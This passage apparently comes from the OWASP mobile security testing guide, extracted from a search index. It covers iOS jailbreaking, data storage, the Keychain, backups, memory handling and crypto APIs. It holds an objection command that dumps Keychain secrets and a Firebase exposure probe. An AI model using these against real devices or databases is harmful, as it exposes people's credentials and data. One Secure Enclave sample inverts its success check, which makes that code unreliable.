Some apps attempt to detect whether the iOS device on which they're running is jailbroken. This is because jailbreaking deactivates some of iOS' default security mechanisms. However, there are several ways to get around these detections, and we'll introduce them in the chapter \"iOS Anti-Reversing Defenses\".
"},{"location":"MASTG/iOS/0x06b-iOS-Security-Testing/#benefits-of-jailbreaking","title":"Benefits of Jailbreaking","text":"End users often jailbreak their devices to tweak the iOS system's appearance, add new features, and install third-party apps from unofficial app stores. For a security tester, however, jailbreaking an iOS device has even more benefits. They include, but aren't limited to, the following:
There are tethered, semi-tethered, semi-untethered, and untethered jailbreaks.
Tethered jailbreaks don't persist through reboots, so re-applying jailbreaks requires the device to be connected (tethered) to a computer during every reboot. The device may not reboot at all if the computer is not connected.
Semi-tethered jailbreaks can't be re-applied unless the device is connected to a computer during reboot. The device can also boot into non-jailbroken mode on its own.
Semi-untethered jailbreaks allow the device to boot on its own, but the kernel patches (or user-land modifications) for disabling code signing aren't applied automatically. The user must re-jailbreak the device by starting an app or visiting a website (not requiring a connection to a computer, hence the term untethered).
Untethered jailbreaks are the most popular choice for end users because they need to be applied only once, after which the device will be permanently jailbroken.
Developing a jailbreak for iOS is becoming more and more complicated as Apple continues to harden their OS. Whenever Apple becomes aware of a vulnerability, it is patched and a system update is pushed out to all users. As it is not possible to downgrade to a specific version of iOS, and since Apple only allows you to update to the latest iOS version, it is a challenge to have a device which is running a version of iOS for which a jailbreak is available. Some vulnerabilities cannot be patched by software, such as the checkm8 exploit affecting the BootROM of all CPUs until A12.
If you have a jailbroken device that you use for security testing, keep it as is unless you're 100% sure that you can re-jailbreak it after upgrading to the latest iOS version. Consider getting one (or multiple) spare device(s) (which will be updated with every major iOS release) and waiting for a jailbreak to be released publicly. Apple is usually quick to release a patch once a jailbreak has been released publicly, so you only have a couple of days to downgrade (if it is still signed by Apple) to the affected iOS version and apply the jailbreak.
iOS upgrades are based on a challenge-response process (generating the so-called SHSH blobs as a result). The device will allow the OS installation only if the response to the challenge is signed by Apple. This is what researchers call a \"signing window\", and it is the reason you can't simply store the OTA firmware package you downloaded and load it onto the device whenever you want to. During minor iOS upgrades, two versions may both be signed by Apple (the latest one, and the previous iOS version). This is the only situation in which you can downgrade the iOS device. You can check the current signing window and download OTA firmware from the IPSW Downloads website.
For some devices and iOS versions, it is possible to downgrade to older versions in case the SHSH blobs for that device were collected when the signing window was active. More information on this can be found on the cfw iOS Guide - Saving Blobs
"},{"location":"MASTG/iOS/0x06b-iOS-Security-Testing/#which-jailbreaking-tool-to-use","title":"Which Jailbreaking Tool to Use","text":"Different iOS versions require different jailbreaking techniques. Determine whether a public jailbreak is available for your version of iOS. Beware of fake tools and spyware, which are often hiding behind domain names that are similar to the name of the jailbreaking group/author.
The iOS jailbreak scene evolves so rapidly that providing up-to-date instructions is difficult. However, we can point you to some sources that are currently reliable.
Note that any modification you make to your device is at your own risk. While jailbreaking is typically safe, things can go wrong and you may end up bricking your device. No other party except yourself can be held accountable for any damage.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/","title":"iOS Data Storage","text":""},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#overview","title":"Overview","text":"The protection of sensitive data, such as authentication tokens and private information, is key for mobile security. In this chapter, you'll learn about the iOS APIs for local data storage, and best practices for using them.
As little sensitive data as possible should be saved in permanent local storage. However, in most practical scenarios, at least some user data must be stored. Fortunately, iOS offers secure storage APIs, which allow developers to use the cryptographic hardware available on every iOS device. If these APIs are used correctly, sensitive data and files can be secured via hardware-backed 256-bit AES encryption.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#nsdata-and-nsmutabledata","title":"NSData and NSMutableData","text":"NSData
(static data objects) and NSMutableData
(dynamic data objects) are typically used for data storage, but they are also useful for distributed objects applications, in which data contained in data objects can be copied or moved between applications. The following are methods used to write NSData
objects:
NSDataWritingWithoutOverwriting
NSDataWritingFileProtectionNone
NSDataWritingFileProtectionComplete
NSDataWritingFileProtectionCompleteUnlessOpen
NSDataWritingFileProtectionCompleteUntilFirstUserAuthentication
writeToFile
: stores data as part of the NSData
classNSSearchPathForDirectoriesInDomains, NSTemporaryDirectory
: used to manage file pathsNSFileManager
: lets you examine and change the contents of the file system. You can use createFileAtPath
to create a file and write to it.The following example shows how to create a complete
encrypted file using the FileManager
class. You can find more information in the Apple Developer Documentation \"Encrypting Your App's Files\"
Swift:
FileManager.default.createFile(\n atPath: filePath,\n contents: \"secret text\".data(using: .utf8),\n attributes: [FileAttributeKey.protectionKey: FileProtectionType.complete]\n)\n
Objective-C:
[[NSFileManager defaultManager] createFileAtPath:[self filePath]\n contents:[@\"secret text\" dataUsingEncoding:NSUTF8StringEncoding]\n attributes:[NSDictionary dictionaryWithObject:NSFileProtectionComplete\n forKey:NSFileProtectionKey]];\n
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#nsuserdefaults","title":"NSUserDefaults","text":"The NSUserDefaults
class provides a programmatic interface for interacting with the default system. The default system allows an application to customize its behavior according to user preferences. Data saved by NSUserDefaults
can be viewed in the application bundle. This class stores data in a plist file, but it's meant to be used with small amounts of data.
Core Data
is a framework for managing the model layer of objects in your application. It provides general and automated solutions to common tasks associated with object life cycles and object graph management, including persistence. Core Data can use SQLite as its persistent store, but the framework itself is not a database.
CoreData does not encrypt it's data by default. As part of a research project (iMAS) from the MITRE Corporation, that was focused on open source iOS security controls, an additional encryption layer can be added to CoreData. See the GitHub Repo for more details.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#sqlite-databases","title":"SQLite Databases","text":"The SQLite 3 library must be added to an app if the app is to use SQLite. This library is a C++ wrapper that provides an API for the SQLite commands.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#firebase-real-time-databases","title":"Firebase Real-time Databases","text":"Firebase is a development platform with more than 15 products, and one of them is Firebase Real-time Database. It can be leveraged by application developers to store and sync data with a NoSQL cloud-hosted database. The data is stored as JSON and is synchronized in real-time to every connected client and also remains available even when the application goes offline.
A misconfigured Firebase instance can be identified by making the following network call:
https://\\<firebaseProjectName\\>.firebaseio.com/.json
The firebaseProjectName can be retrieved from the property list(.plist) file. For example, PROJECT_ID
key stores the corresponding Firebase project name in GoogleService-Info.plist file.
Alternatively, the analysts can use Firebase Scanner, a python script that automates the task above as shown below:
python FirebaseScanner.py -f <commaSeparatedFirebaseProjectNames>\n
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#realm-databases","title":"Realm Databases","text":"Realm Objective-C and Realm Swift aren't supplied by Apple, but they are still worth noting. They store everything unencrypted, unless the configuration has encryption enabled.
The following example demonstrates how to use encryption with a Realm database:
// Open the encrypted Realm file where getKey() is a method to obtain a key from the Keychain or a server\nlet config = Realm.Configuration(encryptionKey: getKey())\ndo {\n let realm = try Realm(configuration: config)\n // Use the Realm as normal\n} catch let error as NSError {\n // If the encryption key is wrong, `error` will say that it's an invalid database\n fatalError(\"Error opening realm: \\(error)\")\n}\n
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#couchbase-lite-databases","title":"Couchbase Lite Databases","text":"Couchbase Lite is a lightweight, embedded, document-oriented (NoSQL) database engine that can be synced. It compiles natively for iOS and macOS.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#yapdatabase","title":"YapDatabase","text":"YapDatabase is a key/value store built on top of SQLite.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#user-interface","title":"User Interface","text":""},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#ui-components","title":"UI Components","text":"Entering sensitive information when, for example, registering an account or making payments, is an essential part of using many apps. This data may be financial information such as credit card data or user account passwords. The data may be exposed if the app doesn't properly mask it while it is being typed.
In order to prevent disclosure and mitigate risks such as shoulder surfing you should verify that no sensitive data is exposed via the user interface unless explicitly required (e.g. a password being entered). For the data required to be present it should be properly masked, typically by showing asterisks or dots instead of clear text.
Carefully review all UI components that either show such information or take it as input. Search for any traces of sensitive information and evaluate if it should be masked or completely removed.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#screenshots","title":"Screenshots","text":"Manufacturers want to provide device users with an aesthetically pleasing effect when an application is started or exited, so they introduced the concept of saving a screenshot when the application goes into the background. This feature can pose a security risk because screenshots (which may display sensitive information such as an email or corporate documents) are written to local storage, where they can be recovered by a rogue application with a sandbox bypass exploit or someone who steals the device.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#keyboard-cache","title":"Keyboard Cache","text":"Several options, such as autocorrect and spell check, are available to users to simplify keyboard input and are cached by default in .dat
files in /private/var/mobile/Library/Keyboard/
and its subdirectories.
The UITextInputTraits protocol is used for keyboard caching. The UITextField
, UITextView
, and UISearchBar
classes automatically support this protocol and it offers the following properties:
var autocorrectionType: UITextAutocorrectionType
determines whether autocorrection is enabled during typing. When autocorrection is enabled, the text object tracks unknown words and suggests suitable replacements, replacing the typed text automatically unless the user overrides the replacement. The default value of this property is UITextAutocorrectionTypeDefault
, which for most input methods enables autocorrection.var secureTextEntry: BOOL
determines whether text copying and text caching are disabled and hides the text being entered for UITextField
. The default value of this property is NO
.App developers can leverage the iOS Data Protection APIs to implement fine-grained access control for user data stored in flash memory. The APIs are built on top of the Secure Enclave Processor (SEP), which was introduced with the iPhone 5S. The SEP is a coprocessor that provides cryptographic operations for data protection and key management. A device-specific hardware key-the device UID (Unique ID)-is embedded in the secure enclave, ensuring the integrity of data protection even when the operating system kernel is compromised.
You can learn more about the Secure Enclave in this BlackHat presentation \"Demystifying the Secure Enclave Processor\" by Tarjei Mandt, Mathew Solnik and David Wang.
The data protection architecture is based on a hierarchy of keys. The UID and the user passcode key (which is derived from the user's passphrase via the PBKDF2 algorithm) sit at the top of this hierarchy. Together, they can be used to \"unlock\" so-called class keys, which are associated with different device states (e.g., device locked/unlocked).
Every file stored on the iOS file system is encrypted with its own per-file key, which is contained in the file metadata. The metadata is encrypted with the file system key and wrapped with the class key corresponding to the protection class the app selected when creating the file.
The following illustration shows the iOS Data Protection Key Hierarchy.
Files can be assigned to one of four different protection classes, which are explained in more detail in the iOS Security Guide:
Complete Protection (NSFileProtectionComplete): A key derived from the user passcode and the device UID protects this class key. The derived key is wiped from memory shortly after the device is locked, making the data inaccessible until the user unlocks the device.
Protected Unless Open (NSFileProtectionCompleteUnlessOpen): This protection class is similar to Complete Protection, but, if the file is opened when unlocked, the app can continue to access the file even if the user locks the device. This protection class is used when, for example, a mail attachment is downloading in the background.
Protected Until First User Authentication (NSFileProtectionCompleteUntilFirstUserAuthentication): The file can be accessed as soon as the user unlocks the device for the first time after booting. It can be accessed even if the user subsequently locks the device and the class key is not removed from memory.
No Protection (NSFileProtectionNone): The key for this protection class is protected with the UID only. The class key is stored in \"Effaceable Storage\", which is a region of flash memory on the iOS device that allows the storage of small amounts of data. This protection class exists for fast remote wiping (immediate deletion of the class key, which makes the data inaccessible).
All class keys except NSFileProtectionNone
are encrypted with a key derived from the device UID and the user's passcode. As a result, decryption can happen only on the device itself and requires the correct passcode.
Since iOS 7, the default data protection class is \"Protected Until First User Authentication\".
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#external-storage","title":"External Storage","text":""},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#the-keychain","title":"The Keychain","text":"The iOS Keychain can be used to securely store short, sensitive bits of data, such as encryption keys and session tokens. It is implemented as an SQLite database that can be accessed through the Keychain APIs only.
On macOS, every user application can create as many Keychains as desired, and every login account has its own Keychain. The structure of the Keychain on iOS is different: only one Keychain is available to all apps. Access to the items can be shared between apps signed by the same developer via the access groups feature of the attribute kSecAttrAccessGroup
. Access to the Keychain is managed by the securityd
daemon, which grants access according to the app's Keychain-access-groups
, application-identifier
, and application-group
entitlements.
The Keychain API includes the following main operations:
SecItemAdd
SecItemUpdate
SecItemCopyMatching
SecItemDelete
Data stored in the Keychain is protected via a class structure that is similar to the class structure used for file encryption. Items added to the Keychain are encoded as a binary plist and encrypted with a 128-bit AES per-item key in Galois/Counter Mode (GCM). Note that larger blobs of data aren't meant to be saved directly in the Keychain-that's what the Data Protection API is for. You can configure data protection for Keychain items by setting the kSecAttrAccessible
key in the call to SecItemAdd
or SecItemUpdate
. The following configurable accessibility values for kSecAttrAccessible are the Keychain Data Protection classes:
kSecAttrAccessibleAlways
: The data in the Keychain item can always be accessed, regardless of whether the device is locked.kSecAttrAccessibleAlwaysThisDeviceOnly
: The data in the Keychain item can always be accessed, regardless of whether the device is locked. The data won't be included in an iCloud or local backup.kSecAttrAccessibleAfterFirstUnlock
: The data in the Keychain item can't be accessed after a restart until the device has been unlocked once by the user.kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly
: The data in the Keychain item can't be accessed after a restart until the device has been unlocked once by the user. Items with this attribute do not migrate to a new device. Thus, after restoring from a backup of a different device, these items will not be present.kSecAttrAccessibleWhenUnlocked
: The data in the Keychain item can be accessed only while the device is unlocked by the user.kSecAttrAccessibleWhenUnlockedThisDeviceOnly
: The data in the Keychain item can be accessed only while the device is unlocked by the user. The data won't be included in an iCloud or local backup.kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly
: The data in the Keychain can be accessed only when the device is unlocked. This protection class is only available if a passcode is set on the device. The data won't be included in an iCloud or local backup.AccessControlFlags
define the mechanisms with which users can authenticate the key (SecAccessControlCreateFlags
):
kSecAccessControlDevicePasscode
: Access the item via a passcode.kSecAccessControlBiometryAny
: Access the item via one of the fingerprints registered to Touch ID. Adding or removing a fingerprint won't invalidate the item.kSecAccessControlBiometryCurrentSet
: Access the item via one of the fingerprints registered to Touch ID. Adding or removing a fingerprint will invalidate the item.kSecAccessControlUserPresence
: Access the item via either one of the registered fingerprints (using Touch ID) or default to the passcode.Please note that keys secured by Touch ID (via kSecAccessControlBiometryAny
or kSecAccessControlBiometryCurrentSet
) are protected by the Secure Enclave: The Keychain holds a token only, not the actual key. The key resides in the Secure Enclave.
Starting with iOS 9, you can do ECC-based signing operations in the Secure Enclave. In that scenario, the private key and the cryptographic operations reside within the Secure Enclave. See the static analysis section for more info on creating the ECC keys. iOS 9 supports only 256-bit ECC. Furthermore, you need to store the public key in the Keychain because it can't be stored in the Secure Enclave. After the key is created, you can use the kSecAttrKeyType
to indicate the type of algorithm you want to use the key with.
In case you want to use these mechanisms, it is recommended to test whether the passcode has been set. In iOS 8, you will need to check whether you can read/write from an item in the Keychain protected by the kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly
attribute. From iOS 9 onward you can check whether a lock screen is set, using LAContext
:
Swift:
public func devicePasscodeEnabled() -> Bool {\n return LAContext().canEvaluatePolicy(.deviceOwnerAuthentication, error: nil)\n}\n
Objective-C:
-(BOOL)devicePasscodeEnabled:(LAContext)context{\n if ([context canEvaluatePolicy:LAPolicyDeviceOwnerAuthentication error:nil]) {\n return true;\n } else {\n return false;\n }\n}\n
Here is sample Swift code you can use to create keys (Notice the kSecAttrTokenID as String: kSecAttrTokenIDSecureEnclave
: this indicates that we want to use the Secure Enclave directly.):
// private key parameters\nlet privateKeyParams = [\n kSecAttrLabel as String: \"privateLabel\",\n kSecAttrIsPermanent as String: true,\n kSecAttrApplicationTag as String: \"applicationTag\",\n] as CFDictionary\n\n// public key parameters\nlet publicKeyParams = [\n kSecAttrLabel as String: \"publicLabel\",\n kSecAttrIsPermanent as String: false,\n kSecAttrApplicationTag as String: \"applicationTag\",\n] as CFDictionary\n\n// global parameters\nlet parameters = [\n kSecAttrKeyType as String: kSecAttrKeyTypeEC,\n kSecAttrKeySizeInBits as String: 256,\n kSecAttrTokenID as String: kSecAttrTokenIDSecureEnclave,\n kSecPublicKeyAttrs as String: publicKeyParams,\n kSecPrivateKeyAttrs as String: privateKeyParams,\n] as CFDictionary\n\nvar pubKey, privKey: SecKey?\nlet status = SecKeyGeneratePair(parameters, &pubKey, &privKey)\n\nif status != errSecSuccess {\n // Keys created successfully\n}\n
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#keychain-data-persistence","title":"Keychain Data Persistence","text":"On iOS, when an application is uninstalled, the Keychain data used by the application is retained by the device, unlike the data stored by the application sandbox which is wiped. In the event that a user sells their device without performing a factory reset, the buyer of the device may be able to gain access to the previous user's application accounts and data by reinstalling the same applications used by the previous user. This would require no technical ability to perform.
When assessing an iOS application, you should look for Keychain data persistence. This is normally done by using the application to generate sample data that may be stored in the Keychain, uninstalling the application, then reinstalling the application to see whether the data was retained between application installations. Use objection runtime mobile exploration toolkit to dump the keychain data. The following objection
command demonstrates this procedure:
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios keychain dump\nNote: You may be asked to authenticate using the devices passcode or TouchID\nSave the output by adding `--json keychain.json` to this command\nDumping the iOS keychain...\nCreated Accessible ACL Type Account Service Data\n------------------------- ------------------------------ ----- -------- ------------------------- ------------------------------------------------------------- ------------------------------------\n2020-02-11 13:26:52 +0000 WhenUnlocked None Password keychainValue com.highaltitudehacks.DVIAswiftv2.develop mysecretpass123\n
There's no iOS API that developers can use to force wipe data when an application is uninstalled. Instead, developers should take the following steps to prevent Keychain data from persisting between application installations:
let userDefaults = UserDefaults.standard\n\nif userDefaults.bool(forKey: \"hasRunBefore\") == false {\n // Remove Keychain items here\n\n // Update the flag indicator\n userDefaults.set(true, forKey: \"hasRunBefore\")\n}\n
There are many legitimate reasons for creating log files on a mobile device, including keeping track of crashes or errors that are stored locally while the device is offline (so that they can be sent to the app's developer once online), and storing usage statistics. However, logging sensitive data, such as credit card numbers and session information, may expose the data to attackers or malicious applications. Log files can be created in several ways. The following list shows the methods available on iOS:
iOS includes auto-backup features that create copies of the data stored on the device. You can make iOS backups from your host computer by using iTunes (till macOS Catalina) or Finder (from macOS Catalina onwards), or via the iCloud backup feature. In both cases, the backup includes nearly all data stored on the iOS device except highly sensitive data such as Apple Pay information and Touch ID settings.
Since iOS backs up installed apps and their data, an obvious concern is whether sensitive user data stored by the app might unintentionally leak through the backup. Another concern, though less obvious, is whether sensitive configuration settings used to protect data or restrict app functionality could be tampered to change app behavior after restoring a modified backup. Both concerns are valid and these vulnerabilities have proven to exist in a vast number of apps today.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#how-the-keychain-is-backed-up","title":"How the Keychain Is Backed Up","text":"When users back up their iOS device, the Keychain data is backed up as well, but the secrets in the Keychain remain encrypted. The class keys necessary to decrypt the Keychain data aren't included in the backup. Restoring the Keychain data requires restoring the backup to a device and unlocking the device with the users passcode.
Keychain items for which the kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly
attribute is set can be decrypted only if the backup is restored to the backed up device. Someone trying to extract this Keychain data from the backup couldn't decrypt it without access to the crypto hardware inside the originating device.
One caveat to using the Keychain, however, is that it was only designed to store small bits of user data or short notes (according to Apple's documentation on Keychain Services). This means that apps with larger local secure storage needs (e.g., messaging apps, etc.) should encrypt the data within the app container, but use the Keychain to store key material. In cases where sensitive configuration settings (e.g., data loss prevention policies, password policies, compliance policies, etc) must remain unencrypted within the app container, you can consider storing a hash of the policies in the keychain for integrity checking. Without an integrity check, these settings could be modified within a backup and then restored back to the device to modify app behavior (e.g., change configured remote endpoints) or security settings (e.g., jailbreak detection, certificate pinning, maximum UI login attempts, etc.).
The takeaway: If sensitive data is handled as recommended earlier in this chapter (e.g., stored in the Keychain, with Keychain backed integrity checks, or encrypted with a key that's locked inside the Keychain), backups shouldn't be security issue.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#process-memory","title":"Process Memory","text":"Analyzing memory can help developers to identify the root causes of problems such as application crashes. However, it can also be used to access to sensitive data. This section describes how to check process' memory for data disclosure.
First, identify the sensitive information that's stored in memory. Sensitive assets are very likely to be loaded into memory at some point. The objective is to make sure that this info is exposed as briefly as possible.
To investigate an application's memory, first create a memory dump. Alternatively, you can analyze the memory in real time with, for example, a debugger. Regardless of the method you use, this is a very error-prone process because dumps provide the data left by executed functions and you might miss executing critical steps. In addition, overlooking data during analysis is quite easy to do unless you know the footprint of the data you're looking for (either its exact value or its format). For example, if the app encrypts according to a randomly generated symmetric key, you're very unlikely to spot the key in memory unless you find its value by other means.
Before looking into the source code, checking the documentation and identifying application components provide an overview of where data might be exposed. For example, while sensitive data received from a backend exists in the final model object, multiple copies may also exist in the HTTP client or the XML parser. All these copies should be removed from memory as soon as possible.
Understanding the application's architecture and its interaction with the OS will help you identify sensitive information that doesn't have to be exposed in memory at all. For example, assume your app receives data from one server and transfers it to another without needing any additional processing. That data can be received and handled in encrypted form, which prevents exposure via memory.
However, if sensitive data does need to be exposed via memory, make sure that your app exposes as few copies of this data as possible for as little time as possible. In other words, you want centralized handling of sensitive data, based on primitive and mutable data structures.
Such data structures give developers direct access to memory. Make sure that this access is used to overwrite the sensitive data and cryptographic keys with zeroes. Apple Secure Coding Guide suggests zeroing sensitive data after usage, but provides no recommended ways of doing this.
Examples of preferable data types include char []
and int []
, but not NSString
or String
. Whenever you try to modify an immutable object, such as a String
, you actually create a copy and change the copy. Consider using NSMutableData
for storing secrets on Swift/Objective-C and use resetBytes(in:)
method for zeroing. Also, see Clean memory of secret data for reference.
Avoid Swift data types other than collections regardless of whether they are considered mutable. Many Swift data types hold their data by value, not by reference. Although this allows modification of the memory allocated to simple types like char
and int
, handling a complex type such as String
by value involves a hidden layer of objects, structures, or primitive arrays whose memory can't be directly accessed or modified. Certain types of usage may seem to create a mutable data object (and even be documented as doing so), but they actually create a mutable identifier (variable) instead of an immutable identifier (constant). For example, many think that the following results in a mutable String
in Swift, but this is actually an example of a variable whose complex value can be changed (replaced, not modified in place):
var str1 = \"Goodbye\" // \"Goodbye\", base address: 0x0001039e8dd0\nstr1.append(\" \") // \"Goodbye \", base address: 0x608000064ae0\nstr1.append(\"cruel world!\") // \"Goodbye cruel world\", base address: 0x6080000338a0\nstr1.removeAll() // \"\", base address 0x00010bd66180\n
Notice that the base address of the underlying value changes with each string operation. Here is the problem: To securely erase the sensitive information from memory, we don't want to simply change the value of the variable; we want to change the actual content of the memory allocated for the current value. Swift doesn't offer such a function.
Swift collections (Array
, Set
, and Dictionary
), on the other hand, may be acceptable if they collect primitive data types such as char
or int
and are defined as mutable (i.e., as variables instead of constants), in which case they are more or less equivalent to a primitive array (such as char []
). These collections provide memory management, which can result in unidentified copies of the sensitive data in memory if the collection needs to copy the underlying buffer to a different location to extend it.
Using mutable Objective-C data types, such as NSMutableString
, may also be acceptable, but these types have the same memory issue as Swift collections. Pay attention when using Objective-C collections; they hold data by reference, and only Objective-C data types are allowed. Therefore, we are looking, not for a mutable collection, but for a collection that references mutable objects.
As we've seen so far, using Swift or Objective-C data types requires a deep understanding of the language implementation. Furthermore, there has been some core re-factoring in between major Swift versions, resulting in many data types' behavior being incompatible with that of other types. To avoid these issues, we recommend using primitive data types whenever data needs to be securely erased from memory.
Unfortunately, few libraries and frameworks are designed to allow sensitive data to be overwritten. Not even Apple considers this issue in the official iOS SDK API. For example, most of the APIs for data transformation (passers, serializes, etc.) operate on non-primitive data types. Similarly, regardless of whether you flag some UITextField
as Secure Text Entry or not, it always returns data in the form of a String
or NSString
.
Inter Process Communication (IPC) allows processes to send each other messages and data. For processes that need to communicate with each other, there are different ways to implement IPC on iOS:
launchd
. It is the most secure and flexible implementation of IPC on iOS and should be the preferred method. It runs in the most restricted environment possible: sandboxed with no root privilege escalation and minimal file system access and network access. Two different APIs are used with XPC Services:NSFileCoordinator
can be used to manage and send data to and from apps via files that are available on the local file system to various processes. NSFileCoordinator methods run synchronously, so your code will be blocked until they stop executing. That's convenient because you don't have to wait for an asynchronous block callback, but it also means that the methods block the running thread.In the \"Mobile App Cryptography\" chapter, we introduced general cryptography best practices and described typical issues that can occur when cryptography is used incorrectly. In this chapter, we'll go into more detail on iOS's cryptography APIs. We'll show how to identify usage of those APIs in the source code and how to interpret cryptographic configurations. When reviewing code, make sure to compare the cryptographic parameters used with the current best practices linked from this guide.
Apple provides libraries that include implementations of most common cryptographic algorithms. Apple's Cryptographic Services Guide is a great reference. It contains generalized documentation of how to use standard libraries to initialize and use cryptographic primitives, information that is useful for source code analysis.
"},{"location":"MASTG/iOS/0x06e-Testing-Cryptography/#cryptokit","title":"CryptoKit","text":"Apple CryptoKit was released with iOS 13 and is built on top of Apple's native cryptographic library corecrypto which is FIPS 140-2 validated. The Swift framework provides a strongly typed API interface, has effective memory management, conforms to equatable, and supports generics. CryptoKit contains secure algorithms for hashing, symmetric-key cryptography, and public-key cryptography. The framework can also utilize the hardware based key manager from the Secure Enclave.
Apple CryptoKit contains the following algorithms:
Hashes:
Symmetric-Key:
Public-Key:
Examples:
Generating and releasing a symmetric key:
let encryptionKey = SymmetricKey(size: .bits256)\n
Calculating a SHA-2 512-bit digest:
let rawString = \"OWASP MTSG\"\nlet rawData = Data(rawString.utf8)\nlet hash = SHA512.hash(data: rawData) // Compute the digest\nlet textHash = String(describing: hash)\nprint(textHash) // Print hash text\n
For more information about Apple CryptoKit, please visit the following resources:
The most commonly used Class for cryptographic operations is the CommonCrypto, which is packed with the iOS runtime. The functionality offered by the CommonCrypto object can best be dissected by having a look at the source code of the header file:
Commoncryptor.h
gives the parameters for the symmetric cryptographic operations.CommonDigest.h
gives the parameters for the hashing Algorithms.CommonHMAC.h
gives the parameters for the supported HMAC operations.CommonKeyDerivation.h
gives the parameters for supported KDF functions.CommonSymmetricKeywrap.h
gives the function used for wrapping a symmetric key with a Key Encryption Key.Unfortunately, CommonCryptor lacks a few types of operations in its public APIs, such as: GCM mode is only available in its private APIs See its source code. For this, an additional binding header is necessary or other wrapper libraries can be used.
Next, for asymmetric operations, Apple provides SecKey. Apple provides a nice guide in its Developer Documentation on how to use this.
As noted before: some wrapper-libraries exist for both in order to provide convenience. Typical libraries that are used are, for instance:
There are various third party libraries available, such as:
There are various methods on how to store the key on the device. Not storing a key at all will ensure that no key material can be dumped. This can be achieved by using a Password Key Derivation function, such as PKBDF-2. See the example below:
func pbkdf2SHA1(password: String, salt: Data, keyByteCount: Int, rounds: Int) -> Data? {\n return pbkdf2(hash: CCPBKDFAlgorithm(kCCPRFHmacAlgSHA1), password: password, salt: salt, keyByteCount: keyByteCount, rounds: rounds)\n}\n\nfunc pbkdf2SHA256(password: String, salt: Data, keyByteCount: Int, rounds: Int) -> Data? {\n return pbkdf2(hash: CCPBKDFAlgorithm(kCCPRFHmacAlgSHA256), password: password, salt: salt, keyByteCount: keyByteCount, rounds: rounds)\n}\n\nfunc pbkdf2SHA512(password: String, salt: Data, keyByteCount: Int, rounds: Int) -> Data? {\n return pbkdf2(hash: CCPBKDFAlgorithm(kCCPRFHmacAlgSHA512), password: password, salt: salt, keyByteCount: keyByteCount, rounds: rounds)\n}\n\nfunc pbkdf2(hash: CCPBKDFAlgorithm, password: String, salt: Data, keyByteCount: Int, rounds: Int) -> Data? {\n let passwordData = password.data(using: String.Encoding.utf8)!\n var derivedKeyData = Data(repeating: 0, count: keyByteCount)\n let derivedKeyDataLength = derivedKeyData.count\n let derivationStatus = derivedKeyData.withUnsafeMutableBytes { derivedKeyBytes in\n salt.withUnsafeBytes { saltBytes in\n\n CCKeyDerivationPBKDF(\n CCPBKDFAlgorithm(kCCPBKDF2),\n password, passwordData.count,\n saltBytes, salt.count,\n hash,\n UInt32(rounds),\n derivedKeyBytes, derivedKeyDataLength\n )\n }\n }\n if derivationStatus != 0 {\n // Error\n return nil\n }\n\n return derivedKeyData\n}\n\nfunc testKeyDerivation() {\n let password = \"password\"\n let salt = Data([0x73, 0x61, 0x6C, 0x74, 0x44, 0x61, 0x74, 0x61])\n let keyByteCount = 16\n let rounds = 100_000\n\n let derivedKey = pbkdf2SHA1(password: password, salt: salt, keyByteCount: keyByteCount, rounds: rounds)\n}\n
Arcane
libraryWhen you need to store the key, it is recommended to use the Keychain as long as the protection class chosen is not kSecAttrAccessibleAlways
. Storing keys in any other location, such as the NSUserDefaults
, property list files or by any other sink from Core Data or Realm, is usually less secure than using the KeyChain. Even when the sync of Core Data or Realm is protected by using NSFileProtectionComplete
data protection class, we still recommend using the KeyChain. See the chapter \"Data Storage on iOS\" for more details.
The KeyChain supports two type of storage mechanisms: a key is either secured by an encryption key stored in the secure enclave or the key itself is within the secure enclave. The latter only holds when you use an ECDH signing key. See the Apple Documentation for more details on its implementation.
The last three options consist of using hardcoded encryption keys in the source code, having a predictable key derivation function based on stable attributes, and storing generated keys in places that are shared with other applications. Using hardcoded encryption keys is obviously not the way to go, as this would mean that every instance of the application uses the same encryption key. An attacker needs only to do the work once in order to extract the key from the source code (whether stored natively or in Objective-C/Swift). Consequently, the attacker can decrypt any other data that was encrypted by the application. Next, when you have a predictable key derivation function based on identifiers which are accessible to other applications, the attacker only needs to find the KDF and apply it to the device in order to find the key. Lastly, storing symmetric encryption keys publicly also is highly discouraged.
Two more notions you should never forget when it comes to cryptography:
Apple provides a Randomization Services API, which generates cryptographically secure random numbers.
The Randomization Services API uses the SecRandomCopyBytes
function to generate numbers. This is a wrapper function for the /dev/random
device file, which provides cryptographically secure pseudorandom values from 0 to 255. Make sure that all random numbers are generated with this API. There is no reason for developers to use a different one.
During local authentication, an app authenticates the user against credentials stored locally on the device. In other words, the user \"unlocks\" the app or some inner layer of functionality by providing a valid PIN, password or biometric characteristics such as face or fingerprint, which is verified by referencing local data. Generally, this is done so that users can more conveniently resume an existing session with a remote service or as a means of step-up authentication to protect some critical function.
As stated before in chapter \"Mobile App Authentication Architectures\": The tester should be aware that local authentication should always be enforced at a remote endpoint or based on a cryptographic primitive. Attackers can easily bypass local authentication if no data returns from the authentication process.
A variety of methods are available for integrating local authentication into apps. The Local Authentication framework provides a set of APIs for developers to extend an authentication dialog to a user. In the context of connecting to a remote service, it is possible (and recommended) to leverage the keychain for implementing local authentication.
